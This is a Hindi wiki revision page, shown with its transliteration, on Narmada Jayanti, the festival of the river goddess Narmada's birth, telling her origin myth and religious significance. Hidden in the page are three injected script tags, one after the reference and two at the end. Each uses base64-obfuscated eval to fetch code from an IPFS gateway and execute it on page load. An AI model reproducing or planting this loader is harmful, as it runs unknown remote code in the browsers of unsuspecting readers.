Difference between revisions of "नर्मदा जयंती"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} '''नर्मदा जयंती''' माँ नर्मदा ...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
{{पुनरीक्षण}}
+
[[चित्र:Narmada devi.jpg|thumb|नर्मदा देवी]]
'''नर्मदा जयंती''' [[नर्मदा नदी|माँ नर्मदा]] के जन्मदिवस यानी [[माघ मास|माघ माह]] के [[शुक्ल पक्ष]] की [[सप्तमी]] को मनायी जाती है।  
+
'''नर्मदा जयंती''' [[नर्मदा नदी|माँ नर्मदा]] के जन्मदिवस यानी [[माघ मास|माघ माह]] के [[शुक्ल पक्ष]] की [[सप्तमी]] को मनायी जाती है। नर्मदा जयंती [[मध्य प्रदेश]] राज्य के [[नर्मदा नदी]] के [[तट]] पर मनायी जाती है। माघ मास के शुक्लपक्ष की सप्तमी तिथि को शास्त्रों में नर्मदा जयंती कहा गया है। नर्मदा जी [[अमरकंटक]] से प्रवाहित होकर रत्नासागर में समाहित हुई है और अनेक जीवों का उद्धार भी किया है।  
*नर्मदा जयंती [[मध्य प्रदेश]] राज्य के [[नर्मदा नदी]] के [[तट]] पर मनायी जाती है।  
+
==नर्मदा जयंती महोत्सव==
*माघ मास के शुक्लपक्ष की सप्तमी तिथि को शास्त्रों में नर्मदा जयंती कहा गया है।
+
अलौकिक और पुण्यदायिनी माँ नर्मदा के जन्मदिवस यानी माघ शुक्ल सप्तमी को नर्मदा जयंती महोत्सव प्रति वर्ष मनाया जाता है। वैसे तो संसार में 999 नदियाँ हैं, पर नर्मदाजी के सिवा किसी भी नदी की प्रदक्षिणा करने का प्रमाण नहीं देखा। [[युग|युगों]] से सभी शक्ति की उपासना करते आए हैं। चाहे वह दैविक, दैहिक तथा भौतिक ही क्यों न हो, इसका सम्मान और पूजन करते हैं।
*नर्मदा जी [[अमरकंटक]] से प्रवाहित होकर रत्नासागर में समाहित हुई है और अनेक जीवों का उद्धार भी किया है।  
+
==कथा==
 +
एक समय सभी [[देवता|देवताओं]] के साथ में [[ब्रह्मा]]-[[विष्णु]] मिलकर भगवान [[शिव]] के पास आए, जो कि (अमरकंटक) मेकल पर्वत पर समाधिस्थ थे। वे अंधकासुर राक्षस का वध कर शांत-सहज समाधि में बैठे थे। अनेक प्रकार से स्तुति-प्रार्थना करने पर शिवजी ने [[आँख|आँखें]] खोलीं और उपस्थित देवताओं का सम्मान किया। देवताओं ने निवेदन किया- हे भगवन्‌! हम देवता भोगों में रत रहने से, बहुत-से राक्षसों का वध करने के कारण हमने अनेक पाप किए हैं, उनका निवारण कैसे होगा आप ही कुछ उपाय बताइए। तब शिवजी की भृकुटि से एक तेजोमय बिन्दु [[पृथ्वी]] पर गिरा और कुछ ही देर बाद एक कन्या के रूप में परिवर्तित हुआ। उस कन्या का नाम नर्मदा रखा गया और उसे अनेक वरदानों से सज्जित किया गया।
 +
<blockquote><poem>'माघै च सप्तमयां दास्त्रामें च रविदिने।
 +
मध्याह्न समये राम भास्करेण कृमागते॥'</poem></blockquote>
 +
माघ शुक्ल सप्तमी को [[मकर राशि]] [[सूर्य]] मध्याह्न काल के समय नर्मदाजी को [[जल]] रूप में बहने का आदेश दिया। तब नर्मदाजी प्रार्थना करते हुए बोली- 'भगवन्‌! संसार के पापों को मैं कैसे दूर कर सकूँगी?' तब भगवान विष्णु ने आशीर्वाद रूप में वक्तव्य दिया-
 +
<blockquote>'नर्मदे त्वें माहभागा सर्व पापहरि भव। त्वदत्सु याः शिलाः सर्वा शिव कल्पा भवन्तु ताः।'</blockquote>
 +
अर्थात् तुम सभी पापों का हरण करने वाली होगी तथा तुम्हारे जल के पत्थर शिव-तुल्य पूजे जाएँगे।<br />
 +
तब नर्मदा ने शिवजी से वर माँगा। जैसे उत्तर में [[गंगा]] स्वर्ग से आकर प्रसिद्ध हुई है, उसी प्रकार से दक्षिण गंगा के नाम से प्रसिद्ध होऊँ। शिवजी ने नर्मदाजी को अजर-अमर वरदान और अस्थि-पंजर राखिया शिव रूप में परिवर्तित होने का आशीर्वाद दिया। इसका प्रमाण [[मार्कण्डेय|मार्कण्डेय ऋषि]] ने दिया, जो कि अजर-अमर हैं। उन्होंने कई कल्प देखे हैं। इसका प्रमाण [[मार्कण्डेय पुराण]] में है।<ref>{{cite web |url= http://hindi.webdunia.com/%E0%A4%A8%E0%A4%B0%E0%A5%8D%E0%A4%AE%E0%A4%A6%E0%A4%BE-%E0%A4%9C%E0%A4%AF%E0%A4%82%E0%A4%A4%E0%A5%80-%E0%A4%AE%E0%A4%B9%E0%A4%A4%E0%A5%8D%E0%A4%B5/%E0%A4%A8%E0%A4%B0%E0%A5%8D%E0%A4%AE%E0%A4%A6%E0%A4%BE-%E0%A4%9C%E0%A4%AF%E0%A4%82%E0%A4%A4%E0%A5%80-%E0%A4%95%E0%A4%BE-%E0%A4%AE%E0%A4%B9%E0%A4%A4%E0%A5%8D%E0%A4%B5-1110210014_1.htm|title=नर्मदा जयंती का महत्व |accessmonthday=13 जून |accessyear=2013 |last= |first= |authorlink= |format= |publisher=वेबदुनिया हिंदी |language=हिंदी}} </ref>
 +
==महत्त्व==
 +
नर्मदाजी का तट सुर्भीक्ष माना गया है। पूर्व में भी जब सूखा पड़ा था तब अनेक ऋषियों ने आकर प्रार्थनाएँ कीं कि भगवन्‌ ऐसी अवस्था में हमें क्या करना चाहिए और कहाँ जाना चाहिए? आप त्रिकालज्ञ हैं तथा दीर्घायु भी हैं। तब मार्कण्डेय ऋषि ने कहा कि [[कुरुक्षेत्र]] तथा [[उत्तर प्रदेश]] को त्याग कर दक्षिण गंगा तट पर निवास करें। नर्मदा किनारे अपनी तथा सभी के प्राणों की रक्षा करें।
  
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
+
 
 +
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक3 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 14: Line 24:
 
[[Category:हिन्दू धर्म]] [[Category:हिन्दू धर्म कोश]]  
 
[[Category:हिन्दू धर्म]] [[Category:हिन्दू धर्म कोश]]  
 
[[Category:महत्त्वपूर्ण दिवस]]
 
[[Category:महत्त्वपूर्ण दिवस]]
[[Category:नया पन्ना मार्च-2012]]
 
  
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 14:19, 13 June 2013

thumb|narmada devi narmada jayanti maan narmada ke janmadivas yani magh mah ke shukl paksh ki saptami ko manayi jati hai. narmada jayanti madhy pradesh rajy ke narmada nadi ke tat par manayi jati hai. magh mas ke shuklapaksh ki saptami tithi ko shastroan mean narmada jayanti kaha gaya hai. narmada ji amarakantak se pravahit hokar ratnasagar mean samahit huee hai aur anek jivoan ka uddhar bhi kiya hai.

narmada jayanti mahotsav

alaukik aur punyadayini maan narmada ke janmadivas yani magh shukl saptami ko narmada jayanti mahotsav prati varsh manaya jata hai. vaise to sansar mean 999 nadiyaan haian, par narmadaji ke siva kisi bhi nadi ki pradakshina karane ka praman nahian dekha. yugoan se sabhi shakti ki upasana karate ae haian. chahe vah daivik, daihik tatha bhautik hi kyoan n ho, isaka samman aur poojan karate haian.

katha

ek samay sabhi devataoan ke sath mean brahma-vishnu milakar bhagavan shiv ke pas ae, jo ki (amarakantak) mekal parvat par samadhisth the. ve aandhakasur rakshas ka vadh kar shaant-sahaj samadhi mean baithe the. anek prakar se stuti-prarthana karane par shivaji ne aankhean kholian aur upasthit devataoan ka samman kiya. devataoan ne nivedan kiya- he bhagavanh‌! ham devata bhogoan mean rat rahane se, bahut-se rakshasoan ka vadh karane ke karan hamane anek pap kie haian, unaka nivaran kaise hoga ap hi kuchh upay bataie. tab shivaji ki bhrikuti se ek tejomay bindu prithvi par gira aur kuchh hi der bad ek kanya ke roop mean parivartit hua. us kanya ka nam narmada rakha gaya aur use anek varadanoan se sajjit kiya gaya.

'maghai ch saptamayaan dastramean ch ravidine.
madhyahn samaye ram bhaskaren krimagate॥'

magh shukl saptami ko makar rashi soory madhyahn kal ke samay narmadaji ko jal roop mean bahane ka adesh diya. tab narmadaji prarthana karate hue boli- 'bhagavanh‌! sansar ke papoan ko maian kaise door kar sakooangi?' tab bhagavan vishnu ne ashirvad roop mean vaktavy diya-

'narmade tvean mahabhaga sarv papahari bhav. tvadatsu yaah shilaah sarva shiv kalpa bhavantu taah.'

arthath tum sabhi papoan ka haran karane vali hogi tatha tumhare jal ke patthar shiv-tuly pooje jaeange.
tab narmada ne shivaji se var maanga. jaise uttar mean ganga svarg se akar prasiddh huee hai, usi prakar se dakshin ganga ke nam se prasiddh hoooan. shivaji ne narmadaji ko ajar-amar varadan aur asthi-panjar rakhiya shiv roop mean parivartit hone ka ashirvad diya. isaka praman markandey rrishi ne diya, jo ki ajar-amar haian. unhoanne kee kalp dekhe haian. isaka praman markandey puran mean hai.[1]

mahattv

narmadaji ka tat surbhiksh mana gaya hai. poorv mean bhi jab sookha p da tha tab anek rrishiyoan ne akar prarthanaean kian ki bhagavanh‌ aisi avastha mean hamean kya karana chahie aur kahaan jana chahie? ap trikalajn haian tatha dirghayu bhi haian. tab markandey rrishi ne kaha ki kurukshetr tatha uttar pradesh ko tyag kar dakshin ganga tat par nivas karean. narmada kinare apani tatha sabhi ke pranoan ki raksha karean.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. narmada jayanti ka mahatv (hiandi) vebaduniya hiandi. abhigaman tithi: 13 joon, 2013.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>